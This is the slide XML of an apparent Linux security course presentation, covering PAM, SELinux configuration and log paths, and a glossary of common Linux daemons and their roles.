          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pluggable Authentication Modules (PAM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic authentication support for apps and services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library file used for holding code and functions that an application may utilize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PAM can allow additional logging and notifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PAM Aware apps, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ldd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libpam.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key Linux Modules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;112;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7598137" y="5288279"/>
            <a:ext cx="975359" cy="447041"/>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579" y="4114107"/>
            <a:ext cx="7309825" cy="2352822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2669557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Security-Enhanced Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>architecture </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>integrated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the Linux Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(LSM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selinux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/audit/audit.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key Linux Security Architecture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0064" y="1803785"/>
            <a:ext cx="7165786" cy="3788198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1256465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Security-Enhanced Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>architecture </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>integrated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the Linux Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(LSM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selinux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/audit/audit.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key Linux Security Architecture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0064" y="1803785"/>
            <a:ext cx="7165786" cy="3788198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="759058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564262" y="4676994"/>
            <a:ext cx="4119738" cy="1865586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Runs programs unobtrusively in the background, without direct control from user, awaiting a specific event or condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Daemons are usually instantiated as a process managed by the Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Crond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (printing), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rlogind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (remote login), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (remote command execution), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>telnetd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shell scripts used to start and stop daemons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Key Linux Components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;112;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8605520" y="5364479"/>
            <a:ext cx="975359" cy="447041"/>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4862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err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>automount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nacron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – execute delayed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tasks at boot time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>td</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – runs jobs queued using the at tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – the task scheduler daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dhcpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Dynamic Host Configuration Protocol service daemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fetchmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – daemon to fetch mail at regular intervals </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – File Transfer Protocol server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>aemon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>gated – routing daemon that handles multiple routing protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ttpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – web server daemon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
